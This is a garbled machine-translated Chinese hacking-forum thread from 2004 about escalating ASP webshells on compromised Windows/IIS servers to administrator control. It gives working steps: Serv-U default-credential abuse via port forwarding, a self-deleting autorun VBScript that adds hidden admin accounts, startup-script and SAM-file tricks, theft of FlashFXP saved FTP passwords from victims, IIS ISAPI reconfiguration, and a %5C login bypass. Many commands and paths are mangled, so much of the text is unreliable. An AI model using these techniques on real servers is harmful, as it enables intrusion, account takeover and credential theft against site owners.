source:
http://www.17nc.com/
Now the ASP Trojan is flying, I have been in turn, I found it used more than 30 ASP Trojans. After the help administrator cleaned up, it was really tired. Think about the administrator is really lazy ...
After uploading the ASP Trojan, if you just modify the home page, or delete files, then you don't have to upgrade the permissions. If you don't want to black, there is an ASP Trojan, there is no use, and you will put a temporary file.啥, and many web servers usually only give you the right to browse the website directory, even the C drive can see, let alone the permissions and perform Trojans.
There are many ways to improve the permissions, but I haven't found an universal method. I can't upgrade the permissions, and there is too much relationship with the website settings. Now I will organize it. I hope that one day will have an universal method. Tell me!
But then, the website is even more difficult, hehe ...
This post has been edited by the author at 2004-12-25 20:53:58]
-------------------------------------------------- ------------------------------
- Author: vjoy
- Release time: 2004-12-25 19:49:19
-
WebShell permission
Online the online leakage, I believe everyone will take a lot of broilers, but they are all Webshell, can not get system authority, how do you get system authority? This is exactly what we have to discuss this time.
OK, enter my webhell
Ah, good, double CPU, speed should be followed, don't take you, how do you will be willing?
Enter your password, go to see, there is no good thing, turn it off, it seems that there is no special thing, see if you can't go to other drive characters, point the C disk, not bad, you can go in, This improves this.
SERV-U upgrade
OK, look at what procedures in his programe, oh, there are serv-u, remember to see the Serv-U has a default username and password, but the number of listeners is 43958, but it is only local to access, but We have port forwarding tools, not afraid. Let's see how much his Serv-U is, telnet xxx.xxx.xxx.xxx 21
The display is actually 3.0, hehe, have to say that this administrator is really unknown. Later, I was scanned, and only FTP's hole did not make up. Since this is the case, we start our upgrading permissions.
Upload fpipe, port forwarding tool, Figure three
Enter d: //wwwroot//fpipe.exe -v -l 81 -r 43958 127.0.0.1, meaning the 43598 port of this unit to 81 port
Then open the serv-u, click Serv-U server on our own machine, click the server on the menu bar, click the new server, then enter the IP, enter the port, and remember that the port is the 81 port we just forwarded. The service name is just like, how do you do it. Then you name the username: Localadministrator Password: #L@ or @P (password is a letter)
Determine, then click the server just built, then you can see existing users, create a new user, plus all permissions. Nor lock root directory
The next is to log in, the landing FTP must be logged in under CMD, after entering the general command, the same time, add the user
FTP> Quote Site EXEC NET.EXE User HK Pass / Add
FTP> Quote Site Exec Net.exe Localgroup Administrators HK / Add
If the other party has opened 3389, don't teach you how to do it. If you don't open, the new IPC connection is created, and the Trojan or the 3389 tool is opened.
two
Auto.ini plus shell.vbs
Autorun.inf
[autorun]
Open = shell.vbs
Shell.vbs
DIM WSH
SET WSH = CreateObject ("wscript.shell")
Wsh.run "Net User Guest / Active: Yes", 0
Wsh.Run "Net User Guest 520LS", 0
wsh.run "Net localgroup administrators guest / add", 0
Wsh.Run "Net User HKBME 520LS / Add", 0
Wsh.run "Net localgroup administrators hkbme / add", 0
Wsh.Run "cmd.exe / c del autorun.inf", 0
wsh.run "cmd.exe / c del shell.vbs", 0
But so you can access the root directory of the other party. Put these two files into the root of the other's hard drive. Of course, you can also perform Trojans directly, but also a Trojan, but the statement is the same as the last two sentences, perform Trojans through CMD
three
Folder.htt with Desktop.ini
Folder.htt will be rewritten with Desktop.ini, and your Trojan or VBS or what is the most likely browsing of the other party, I feel that it is not enough, you can put more a few more
Folder.htt Add code
Object>
However, the back door and these two files must be put into one, a little problem, can start the VBS, after running, delete uploaded lattime. It is codebase = "shell.vbs" .shell Writing
four
Replace
Alternative method, you can replace the file being executed. It is almost possible to get permissions immediately, but I have not done it, I can try it, replace the files that the other party being executed is the same as the file name, bundled Trojan. Why don't you replace the Trojan? If you replace a key program, don't you hang it directly? So still bundle
format
Replace [Drive1:] [Path1] FileName [Drive2:] [Path2] [/ A]
[/ R] [/ w]
Replace [Drive1:] [PATH1] FileName [Drive2:] [PATH2]
[/ R] [/ s] [/ w]
[Drive1:] [Path1] FileName Specifies the source file.
[Drive2: [PATH2] Specifies to replace files
table of Contents.
/ A Add a new file to the target directory. Cannot and
/ S or / u Command line switch is used.
/ P Replace your file or join the source file before prompted you
Undergo verification.
/ R Replace the read-only file and unprotected files.
/ S Replace the file of all subdirectories in the target directory.
Can't communicate with / a command options
For use with.
/ W Waiting for you to run again after inserting the disk.
/ U will only replace or update files that have previously earlier than source files.
Can't use with / a command line switch
This command has not been trial, see the files under the folder that cannot be accessed, everyone can test
Fives
script
Write a boot / shutdown script configuration file Scripts.ini, this file name is fixed and cannot be changed. The content is as follows:
[Startup]
0cmdline = a.bat
0Parameters =
Save the file Scripts.ini to "C: // WinNT // System32 // GroupPolicy // Machine // Scripts"
A.BAT content can be Net User Yonghu Mima
Can also be NET User Administrator XXX
This can restore the password you want to have any user name, you can also add new users, but to rely on reboot, there is a writable for System32.
six
Sam
If you can access the other party's SYSTEM32, remove the other party's SAM file, wait for him to restart, the admin user password is empty.
Suddenly, I have an idea, can I replace it with the replace command, you can extract your SAM file and upload it to any of his reputation, and then replace it. But I don't know if I have no permissions to System32, I can replace it.
-------------------------------------------------- ------------------------------
- Author: vjoy
- Release time: 2004-12-25 19:51:04
-
Using FlashFXP to improve the permissions recently got a lot of broilers :) Some people are too busy, everyone's method is just the use of the back door of the ASP script. As for the issue of promoting the power, few people can do one breath. The key is to do a problem on the improvement permissions, and many of the server settings are very bt, your ASP Troja may not be used, but also the improvement there. We get WebShell is the authority of a low-level user. Various improved permissions method is to be described as five flowers. How to improve your own tricks.
First, if there is a PCANYWHERE server installed on the server, the administrator has given us convenient to facilitate management, and the Documents and Settings / All Users / Application Data / Symantec / Pcanywhere / Symantec / Pcanywhere / Symantec / PcAnywhere crack Use the PCANywhere connection to OK.
Second, if the other party has SERV-U, don't marry me, by modifying servudaemon.ini and fpipe, this software improvement should not be a question.
Third, through replacement system services to improve.
Its four, finding the documentation of CONN and Config to see if SA or MySQL's related password may be harvested.
I found this method in a boring intrusion, using FlashFXP to improve the permissions, but the success rate is high, see your own luck :)
I got a WebShell through BBS at www.xxx.com, put a pony (now the famousah's name is too big, I don't dare to put a piece of code into n files, black. The improvement permissions don't have time. After I went home, I saw that I was halo BBS upgrade to the mobile network SP2, I put the pony was also K, and the BBS of others was Access version. Depressed! Suddenly remembered that I insert a page into the back door of the ASP and see if there is still hope. Enter www.xxx.com/xx.asp?id = 1 good guy, still! Happy ING Figure 1
So I uploaded an ASP's latter, how to improve permissions?
On the host of this website, I wandered N minutes, found a flashfxp folder under C: // Program Files (using this software as yourself like me) Figure 2, then I have already hit Sites. DAT this file ( Edit) This is something password and user name, and the password is addressed.
If I put these files back to the local location, how about it? Replace my local corresponding file?
So I downloaded the Sites.Dat Sites.Dat.bak Stats.dat Stats.dat.bak Download several files to my computer replaced the corresponding file of the FlashFXP folder in my computer. Open FlashFXP Open the site manager in the site.乖 乖 发
The other sources are in Figure 3 through the various sites connected to the FlashFXP connection. Through us, we have a bunch of broilers, we have FTP privileges. Upload script Trojans ~ huh, huh.
Talking about this for a long time, this improved permissions did not speak.
Don't worry, everyone look at the site manager of the other party, has the username and password, the password is an asterisk. what a pity!
Also think of the password and user name in sites.dat, and the password is encrypted.
Now the start of the star is also adding secrets. Look, you will go.
How to see? The rookie has a good look at the software, which is the XP asterisk Password viewer, and compares the password by viewing Sites.dat. The comparison of Figure 4 and Figure 5 is obvious that the password as seen in the site manager is displayed in plaintext. Make a fortune
The next step is to use the XP asterisk Password viewer to extract passwords and usernames. The complex password of the viewer is really a little missing the time of playing SNIFF. Ha ha
The password is: b69ujkq6 Hyndai790 S584P * FV4-C 98CQ3JK4 3-8 * EF. / 2Z5
Username: BN7865T Nilei75 QM / -G57 3KN QM / -G57 3KN 5.e * 82 / 69
(The above password and username have been necessary to modify)
So much information, according to the concept of social engineering, there is no administrator's password. I don't believe it. In the end, I got the password of this website administrator from this pile.
I think this question should be fed back to FlashFXP official, let them correct this vulnerability or error in the next release. After later testing, simply replace the SITES.DAT file containing the password and the username to the local corresponding file, you can restore the password of each site of the other party. I hope that when you encounter Fla SHFXP, you can think of this method, at least a pile of new broilers. Do not prevent try? I hope to give us help.
-------------------------------------------------- ------------------------------
- Author: vjoy
- Release time: 2004-12-25 19:52:16
-
Remind the ASP permission to the highest by: cnqing from:
http://friend.91eb.com
Originally, I would like to write a proprietary ASP Trojan. Unfortunately, the time is not too much skill. Let me tell you the principle method first. Simply talk about it, there is no need to say too much. I understand it. principle:
Asp files are running by ASP.DLL. Started by dllhost.exe. The identity is IWAN_NAME. If you put asp.dll in InProcesslsapiapps, it is started directly by inetifo.exe. Identity is System
method:
first step.
Get the contents of InProcesslsapiapps, with the command "CScript C: //inetpub//adminscripts//adsutil.vbs Get W3SVC / Inprocessisapiapps". A set of DLLs will be copied.
Second step
Write a BAT content for "CScript c: // inetpub // adminScripts // adsutil VBS set w3svc / inprpocessisapiapps" c: //inetpub//adminscripts//asp.dll "····
The omitted content is copied. Do not bring back the car with spaces
Finally, run this BAT.
E.g:
I have obtained with "CScript C: //inetpub//adminscripts//adsutil.vbs get w3svc / inprocessisapiapps"
"c: //winnt//system32//inetsrv/httpext.dll"
"C: //winnt//system32//inetsrv/httpodbc.dll"
"C: //winnt//system32//inetsrv//ssinc.dll"
"C: //winnt//system32//msw3prt.dll"
"C: // Program files // Common files // Microsoft Shared // Web Server Extensions // Isapi // VTI_AUT // Author.dll"
"C: // program files // common files // microsoft shared // web server extensions // isapi // vTI_adm // admin.dll"
"C: // program files // Common files // microsoft shared // Web server extensions // isapi // shtml.dll"
Then your BAT should be:
Cscript c: // inetpub // adminScripts // adsutil VBS set w3svc / inprpocessisapiapps "c: //inetpub//adminscripts//asp.dll" C: //winnt//system32/inetsrv//httpext.dll " "c: //winnt//system32/inetsrv/Httpodbc.dll" "c: //winnt/system32//inetsrv//ssinc.dll" "C: //winnt/system32//msw3prt.dll "" C: // Program Files // Common Files // Microsoft Shared // Web Server Extensions // ISAPI / / VTI_AUT // Author.dll "C: // Program Files // Common Files // Microsoft Shared //// Web server extensions // isapi // vti_adm // admin.dll "C: // Program files // common files // microsoft shared // Web server extensions // isapi // shtml.dll" has been tested! !
-------------------------------------------------- ------------------------------
- Author: vjoy
- Release time: 2004-12-25 19:53:18
-
By using% 5C to bypass the verification
By using% 5C to bypass the verification
---------------------------------------
Lake2
http://mrhupo.126.com)
2004-11-27
---------------------------------------
Speaking of% 5c, do you think of the current popular% 5C branches, huh, this article is an exploration of% 5C (Oh, of course, there is a new stuff I proposed, maybe it is helpful to you ^ _ _ ^).
Ok, let's chase the roots, find the old bottom of the vulnerability. Look at the vulnerability announcement of the Great League 2001:
http://www.nsfocus.net/index.php?ac...iew&bug_id=1429
N years ago, this vulnerability can be used to realize the directory traversal, although Microsoft has a patch, but it seems that the patch is used to limit IIS to only access the virtual directory, so the vulnerability is still existed, but it is only available. For IIS, submit a URL containing% 5C to find files, but other files referenced in the file are not found (% 5c is //'s URL encoding, IIS jumps to the previous directory) Find, of course, can't find; dizziness, haha, I am dizzy).
Later, this vulnerability was excavated by the cattle, but also the legendary 5C branches: due to the relative path of the file references to the database, submit% 5C can't find the file, so IIS will be old and old. Path of the database (do not understand? Looking for Google).
An accidental opportunity I found that you can also use% 5C to bypass the ASP verification; try it when we fails in the branches.
Stapless, look at the following code:
<%
Guest_user = trim (Request ("Guest_USER"))
Guest_password = trim (Request ("Guest_password"))
SET RS = Server.createObject ("AdoDb.Recordset")
SQL = "SELECT * from admin where id = 1"
RS.Open SQL, CONN, 3, 2
Readuser = RS ("Guest_USER")
Readpassword = rs ("Guest_password")
IF readuser <> guest_user or readpassword <> guest_password kil
Response.write "Please enter the correct administrator password!"
Response.end
Else
Session ("admin") = 1 / 'After logging in, write Seesion Save
Response.write ("Successful landing, please return the information page")
END IF
%>
Seeing that there is no, if you want to verify that you must make the username password in the database and submit; what? Let's take a look at the database connection file code:
<%
ON Error ResMe next
Set conn = server.createObject ("adoDb.connection")
Dbpath = server.mappath ("Guestbook.asp")
Conn.open "Driver = {Microsoft Access Driver (* .mdb)}; dbq =" & dbpath
%>
Ah, there is a fault-tolerant statement that cannot be treasure! Wait, if the submission% 5C database can't be found, due to fault, the program will continue, then the username password you get from the database is empty (thinking that sometimes the branches fail is to see the empty frame, because The data is empty), haha, so we will bypass the verification!
Know how to do it, save the landing page to the local, modify the submitted URL, put the last / change to% 5c, username password space (some programs check if the username password is empty, space will be filtered by the program ), Submit, OK.
Hey, you don't think that I have nothing to write to the code. In fact, this is a message board program made by our school, just hanging at the home page of the school, huh, huh.
Since understanding the principles, of course, I have to find the actual vulnerability, naturally the "hole" network forum opened by the famous name. But there is a failure because it has such a paragraph:
IF Err THEN
Err.clear
Set conn = Nothing
Response.write "Database connection error, please check the connection string."
Response.end
END IF
The database is not found, huh, huh, empty.
Then go to Down's BBSXP Forum, open the database connection file, halo, there is no tolerant statement; huh, but you can burn.
I am not BT, so I don't look for it, write articles, I will give you a master. Summarize this condition for this attack method: 1. The relative path for database connection is only a simple fault-tolerant statement; 2. Server IIS version is 4 or 5; 3. If you do not check empty characters or check, filter spaces Filter spaces during comparison; 4, the program cannot be in the first class
As for the prevention, huh, since the attack conditions know, the prevention measures have naturally come out ^ _ ^
-------------------------------------------------- ------------------------------
- Author: vjoy
- Published: 2004-12-25 19:57:36
-
Add a super user's .asp code [blue screen original, Kevin improvement, MS unpublished vulnerability]
Author: blue, Kevin Source: freezing limit
In fact, the last week and Kevin were tested on my broiler, as well as the Hippo epic. The result is a user who successfully added the Administrators group under User permission (although I can't believe my eyes).
The last time Kevin did not speak, I didn't dare to release it .... Now I have seen him on his blog, it turns back (it has also improved a little more than I last test, add a form) Everyone has a blessing `` `
Anyway code is right, but very few can succeed, take advantage of luck. . Oh, the next step I want to integrate him into the ocean.嘿嘿.
.Network object script permissions Lifting Vulnerability Utilization Tool Head>